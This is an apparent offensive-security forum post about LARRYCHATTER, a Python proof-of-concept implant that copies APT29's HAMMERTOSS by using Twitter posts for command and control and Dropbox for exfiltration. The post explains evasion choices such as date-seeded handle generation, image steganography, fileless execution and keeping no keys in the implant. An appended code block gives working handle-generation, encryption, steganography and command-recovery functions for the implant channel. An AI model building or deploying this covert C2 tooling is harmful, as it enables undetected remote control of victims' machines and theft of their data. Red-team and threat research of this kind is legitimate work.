LARRYCHATTER - PoC HAMMERTOSS - C2 over Twitter

Hey Offsec mates,

So I was reading the report by FireEye on the Russian state-sponsored cyber operator team APT 29 and their malware named HAMMERTOSS (tDiscoverer).
What it did was generate seemingly “random” Twitter handles periodically and use commands embedded in a tweeted image from that handle for C&C.
Basically, their motto is to mimic human behaviour so as not to get caught by next-gen network security solutions.
Naturally, it caught my eye due to the unconventional C2 channel used by them.
I mean, sure, we have seen social media used as C2 in real life by APTs such as the Indian Patchwork team, etc., but we don’t really see it often, do we?

I decided to create a quick prototype in Python 3 demonstrating the implant’s capabilities, and also added some extra features. Now, originally I intended to make a C2 framework much like Empire, Faction, Sliver, Covenant, etc., as I thought it’d be a cool addition to a Red Team operator’s arsenal, but I got caught up in some other work, so the project never progressed further and development halted.

Full disclosure: The code is messy as hell since I didn’t get time to clean it up, but it works. It’s perhaps stupid, but it works as intended so far.

I’m posting the link to the Github repository in case someday someone might find it useful and create a production C2 framework based on it.
Here’s the link: https://github.com/slaeryan/LARRYCHATTER

Oh and P.S. - Did you know the cute bird of Twitter is named Larry? Chatter of course means communication. Ergo, I thought it’d be appropriate to name the project LARRYCHATTER.

Hope you guys find it useful, cheers!


Could you explain any of the code here?

Sure.
Okay so what I did was stupid simple.
The project has two parts namely the LP and the Implant.

On the LP side, there’s not much to explain: it just takes a command from the operator, encrypts the command using a Python crypto lib and then embeds the encrypted command in an image (also fed by the operator) before posting the stego image from the Twitter handle whose Developer API tokens have to be fed into the script.

The Implant side is based on web-scraping so as to avoid hard coding any API keys on the Implant side. I use BeautifulSoup lib to scrape the image from the Twitter handle and then proceed to extract the embedded encrypted command from the image, decrypt it and then proceed to perform the intended action on the host. All of this happens without touching the disk.

Dropbox is used for data exfiltration in the current form. Again, to avoid hard coding the Dropbox API key on the Implant, I pass it along with the command embedded in the image, separated by a single space.

I’ve also avoided hard coding anything on the Implant side as much as possible since it’s detrimental to OPSEC and it makes the Implant somewhat more resilient.

Regarding the Twitter handle generation algorithm: what I’ve made is a simple pseudo-random generator. In other words, not really random, but possible to predict with the correct seed. I’ve used the current date as the seed, after hashing it and extracting some characters out of the hash. The LP and the Implant will be kept in sync through the use of this algorithm. The end result is that it’s quite difficult to predict the Twitter handle using statistical analysis, unlike some DGAs (Domain Generation Algorithms), without reverse-engineering the implant first, which, as we all know here, may not be child’s play, making it more resilient.

I hope I’ve touched upon the basic concepts but I’d be happy to provide any additional technical details.
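The three moving parts described in the reply above (date-seeded handle generation shared by LP and implant, an encrypted command hidden in an image, and the implant recovering the command plus the space-separated Dropbox token), modelled end to end as an added example. This is not LARRYCHATTER's own code and does not reproduce its exact scheme: the `HANDLE_SALT` value, the HMAC-SHA256 keystream-plus-tag cipher standing in for the unnamed "Python crypto lib", the raw byte buffer standing in for real image pixels, the `lc_` handle prefix, and the token-last message layout are all assumptions made for illustration. It runs on the standard library only.

```python
import datetime
import hashlib
import hmac
import os

# ---- 1. Handle generation: hash the date, take characters out of the hash ----
# Assumed: a salt baked into both LP and implant; the project's exact scheme is not shown.
HANDLE_SALT = b"larry"

def handle_for_date(day_iso: str) -> str:
    """Same date string on LP and implant -> same handle, so both stay in sync."""
    digest = hashlib.sha256(HANDLE_SALT + day_iso.encode()).hexdigest()
    # Twitter handles allow [A-Za-z0-9_] and at most 15 characters.
    return ("lc_" + digest)[:15]

def todays_handle() -> str:
    return handle_for_date(datetime.date.today().isoformat())

# ---- 2. Authenticated encryption (stdlib stand-in for a real crypto lib):
# HMAC-SHA256 in counter mode as keystream, separate HMAC key for the tag ----
def _subkeys(key: bytes):
    return (hmac.new(key, b"enc", hashlib.sha256).digest(),
            hmac.new(key, b"mac", hashlib.sha256).digest())

def _keystream(enc_key: bytes, nonce: bytes, n: int) -> bytes:
    out, ctr = b"", 0
    while len(out) < n:
        out += hmac.new(enc_key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:n]

def encrypt(key: bytes, plaintext: bytes) -> bytes:
    enc_key, mac_key = _subkeys(key)
    nonce = os.urandom(16)
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(enc_key, nonce, len(plaintext))))
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag

def decrypt(key: bytes, blob: bytes) -> bytes:
    enc_key, mac_key = _subkeys(key)
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("authentication tag mismatch: image tampered or wrong key")
    return bytes(c ^ k for c, k in zip(ct, _keystream(enc_key, nonce, len(ct))))

# ---- 3. LSB steganography over a raw pixel buffer (one byte per channel) ----
def lsb_embed(cover: bytes, payload: bytes) -> bytes:
    data = len(payload).to_bytes(4, "big") + payload   # 32-bit length prefix, then payload
    bits = [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]   # MSB first
    if len(bits) > len(cover):
        raise ValueError("cover image too small for payload")
    stego = bytearray(cover)
    for i, bit in enumerate(bits):
        stego[i] = (stego[i] & 0xFE) | bit       # overwrite only the low bit
    return bytes(stego)

def lsb_extract(stego: bytes) -> bytes:
    def read_bytes(offset_bits: int, count: int) -> bytes:
        out = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (stego[offset_bits + b * 8 + i] & 1)
            out.append(value)
        return bytes(out)
    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)

# ---- 4. LP and implant ends tied together ----
def lp_build_tweet(key: bytes, cover: bytes, command: str, dropbox_token: str) -> bytes:
    # Assumed layout: command first, Dropbox token last, separated by a single space.
    return lsb_embed(cover, encrypt(key, f"{command} {dropbox_token}".encode()))

def implant_recover(key: bytes, stego: bytes):
    text = decrypt(key, lsb_extract(stego)).decode()
    command, _, token = text.rpartition(" ")   # token is the last space-separated field
    return command, token

if __name__ == "__main__":
    key = b"shared-session-key"                # assumed pre-shared between LP and implant
    cover = bytes(range(256)) * 64             # constructed 16 KiB "pixel" buffer, no real image
    img = lp_build_tweet(key, cover, "whoami /all", "sl.FAKE_DROPBOX_TOKEN")
    print(todays_handle(), implant_recover(key, img))
```

The tag check is the part worth keeping whatever cipher you swap in: the implant pulls its tasking from a public timeline, so anyone who reproduces the handle can post an image there, and an unauthenticated ciphertext would let them feed the implant garbage or chosen commands.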
